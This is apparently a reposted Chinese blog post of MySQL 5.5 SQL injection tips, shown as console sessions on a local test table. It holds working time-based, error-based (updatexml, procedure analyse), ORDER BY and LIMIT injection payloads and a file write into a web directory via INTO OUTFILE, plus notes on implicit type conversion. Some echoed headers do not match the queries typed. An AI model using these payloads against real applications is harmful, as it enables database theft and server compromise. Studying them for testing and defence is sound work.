原文链接:http://wyb0.com/posts/some-tips-for-sql-injection/
环境:MySQL 5.5.47
0x00 基于时间的注入payload
mysql> select if((select database()) like "rte%",sleep(2),null);
+---------------------------------------------------+
| if((select database()) like "rte%",sleep(2),null) |
+---------------------------------------------------+
| 0 |
+---------------------------------------------------+
1 row in set (2.00 sec)
mysql> select if((select database())="rteaaa",sleep(2),666);
+-----------------------------------------------+
| if((select database())="rtest1",sleep(2),666) |
+-----------------------------------------------+
| 666 |
+-----------------------------------------------+
1 row in set (0.00 sec)
mysql> select if((select database())="rtest",sleep(2),666);
+----------------------------------------------+
| if((select database())="rtest",sleep(2),666) |
+----------------------------------------------+
| 0 |
+----------------------------------------------+
1 row in set (2.00 sec)
mysql> select id,name,title from msg where id=if(1=1,benchmark(10000000,md5(11)),false);
Empty set (2.18 sec)
mysql> select id,name,title from msg where id=if(1=2,benchmark(10000000,md5(11)),false);
Empty set (0.00 sec)
0x01 注入点在Order by后面
mysql> select id,name,content from msg where id>1 order by id into outfile 'C:\\Apps\\phpStudy\\WWW\\a.txt';
Query OK, 1 row affected (0.01 sec)
mysql> select id,name,content from msg where id>1 order by updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1),0x7e),1);
ERROR 1105 (HY000): XPATH syntax error: '~msg~'
mysql> select id,name,content from msg where id>1 order by name procedure analyse(updatexml(1,concat(0x7e,database(),0x7e),1),1);
ERROR 1105 (HY000): XPATH syntax error: '~rtest~'
mysql> select name from msg where id>1 order by if(1=1,1,(select 1 union select 2));
+----------+
| name |
+----------+
| xiaohong |
+----------+
1 row in set (0.00 sec)
mysql> select name from msg where id>1 order by if(1=2,1,(select 1 union select 2));
ERROR 1242 (21000): Subquery returns more than 1 row
mysql> select name from msg where id>1 order by (select case when(2>1) then 1 else 1*(select 1 union select 2)end)=1;
+----------+
| name |
+----------+
| xiaohong |
+----------+
1 row in set (0.00 sec)
mysql> select name from msg where id>1 order by (select case when(2<1) then 1 else 1*(select 1 union select 2)end)=1;
ERROR 1242 (21000): Subquery returns more than 1 row
0x02 注入点在limit后面
- limit前面没有order by可以使用union、analyse()
mysql> select id,name,content from msg where id>1 limit 1,1 union select 1,2,3;
+----+------+---------+
| id | name | content |
+----+------+---------+
| 1 | 2 | 3 |
+----+------+---------+
1 row in set (0.01 sec)
mysql> select id,name,content from msg where id>1 limit 1,1 procedure analyse();
+-------------------+---------------+---------------+------------+------------+
| Field_name | Min_value | Max_value | Min_length | Max_length |
+-------------------+---------------+---------------+------------+------------+
| rtest.msg.name | xiaohong | xiaohong | 8 | 8 |
| rtest.msg.content | I have a cat. | I have a cat. | 13 | 13 |
+-------------------+---------------+---------------+------------+------------+
------------------+-------+-------------------------+------+--------------------+
Empties_or_zeros | Nulls | Avg_value_or_avg_length | Std | Optimal_fieldtype |
------------------+-------+-------------------------+------+--------------------+
0 | 0 | 8.0000 | NULL | ENUM('xiaohong') NOT NULL |
0 | 0 | 13.0000 | NULL | ENUM('I have a cat.') NOT NULL|
------------------+-------+-------------------------+------+--------------------+
2 rows in set (0.00 sec)
- limit前面有order by则不可以使用union、analyse()
mysql> select id,name,content from msg where id>1 limit 1,1 procedure analyse(updatexml(1,concat(0x7e,@@version,0x7e),1),1);
ERROR 1105 (HY000): XPATH syntax error: '~5.5.47~'
mysql> select id,name,content from msg where id>1 order by name limit 1,1 procedure analyse(updatexml(1,concat(0x7e,@@version,0x7e),1),1);
ERROR 1105 (HY000): XPATH syntax error: '~5.5.47~'
0x03 根据报错得到数据库名、表名、列名
#得到数据库名为rtest
mysql> select id,name,content from msg where id=2-a();
ERROR 1305 (42000): FUNCTION rtest.a does not exist
#得到表名为msg
mysql> select id,name,content from msg where id=2 and polygon(1);
ERROR 1367 (22007): Illegal non geometric '1' value found during parsing
mysql> select id,name,content from msg where id=2 and polygon(id);
ERROR 1367 (22007): Illegal non geometric '`rtest`.`msg`.`id`' value found during parsing
#得到列名为id、name、content、useragent
mysql> select id,name,content from msg where id=2 and (select * from(select * from msg as a join msg as b)c);
ERROR 1060 (42S21): Duplicate column name 'id'
mysql> select id,name,content from msg where id=2 and (select * from(select * from msg as a join msg as b using(id))c);
ERROR 1060 (42S21): Duplicate column name 'name'
mysql> select id,name,content from msg where id=2 and (select * from(select * from msg as a join msg as b using(id,name))c);
ERROR 1060 (42S21): Duplicate column name 'content'
mysql> select id,name,content from msg where id=2 and (select * from(select * from msg as a join msg as b using(id,name,content))c);
ERROR 1060 (42S21): Duplicate column name 'useragent'
mysql> select id,name,content from msg where id=2 and (select * from(select * from msg as a join msg as b using(id,name,content,useragent))c);
ERROR 1241 (21000): Operand should contain 1 column(s)
0x04 MySQL的隐式转换
-
官方隐式转换规则
- 两个参数至少有一个是 NULL 时,比较的结果也是 NULL,例外是使用 <=> 对两个 NULL 做比较时会返回 1,这两种情况都不需要做类型转换
- 两个参数都是字符串,会按照字符串来比较,不做类型转换
- 两个参数都是整数,按照整数来比较,不做类型转换
- 十六进制的值和非数字做比较时,会被当做二进制串
- 有一个参数是 TIMESTAMP 或 DATETIME,并且另外一个参数是常量,常量会被转换为 timestamp
- 有一个参数是 decimal 类型,如果另外一个参数是 decimal 或者整数,会将整数转换为 decimal 后进行比较,如果另外一个参数是浮点数,则会把 decimal 转换为浮点数进行比较
- 所有其他情况下,两个参数都会被转换为浮点数再进行比较
-
数字和字符进行运算时会转换为double类型
mysql> select 2+'4'; #数字和字符会转换为数字
+-------+
| 2+'4' |
+-------+
| 6 |
+-------+
1 row in set (0.00 sec)
mysql> select 'a'+'55'; #字符和字符会转换为数字
+----------+
| 'a'+'55' |
+----------+
| 55 |
+----------+
1 row in set, 1 warning (0.00 sec)
mysql> select '33'+'32d11a';
+-----------+
| '33'+'3d' |
+-----------+
| 65 |
+-----------+
1 row in set, 1 warning (0.00 sec)
- concat()函数将数字转换为字符
mysql> select concat(3,'test'); #前面的数字1被转换为字符
+------------------+
| concat(3,'test') |
+------------------+
| 3test |
+------------------+
1 row in set (0.00 sec)
- name类型为string,查询条件为int 0时可以查询
mysql> desc msg;
+-----------+---------------+------+-----+---------+----------------+
| Field | Type | Null | Key | Default | Extra |
+-----------+---------------+------+-----+---------+----------------+
| id | int(11) | NO | PRI | NULL | auto_increment |
| name | varchar(30) | NO | | NULL | |
| content | varchar(1024) | NO | | NULL | |
| useragent | varchar(1024) | NO | | NULL | |
+-----------+---------------+------+-----+---------+----------------+
4 rows in set (0.01 sec)
mysql> select id,name,content from msg where id=1 and name=0;
+----+----------+--------------+
| id | name | content |
+----+----------+--------------+
| 1 | xiaoming | hello world. |
+----+----------+--------------+
1 row in set, 2 warnings (0.00 sec)
mysql> show warnings;
+---------+------+----------------------------------------------+
| Level | Code | Message |
+---------+------+----------------------------------------------+
| Warning | 1292 | Truncated incorrect DOUBLE value: 'xiaoming' |
+---------+------+----------------------------------------------+
2 rows in set (0.00 sec)
mysql> select id,name,content from msg;
+----+----------+---------------+
| id | name | content |
+----+----------+---------------+
| 1 | xiaoming | hello world. |
| 2 | xiaohong | I have a cat. |
| 3 | 55lihua | ni hao |
+----+----------+---------------+
3 rows in set (0.00 sec)
mysql> select id,name,content from msg where name='li'+'55';
+----+---------+---------+
| id | name | content |
+----+---------+---------+
| 3 | 55lihua | ni hao |
+----+---------+---------+
1 row in set, 4 warnings (0.01 sec)
mysql> show warnings;
+---------+------+----------------------------------------------+
| Level | Code | Message |
+---------+------+----------------------------------------------+
| Warning | 1292 | Truncated incorrect DOUBLE value: 'xiaoming' |
| Warning | 1292 | Truncated incorrect DOUBLE value: 'li' |
| Warning | 1292 | Truncated incorrect DOUBLE value: 'xiaohong' |
| Warning | 1292 | Truncated incorrect DOUBLE value: '55lihua' |
+---------+------+----------------------------------------------+
4 rows in set (0.00 sec)
网友评论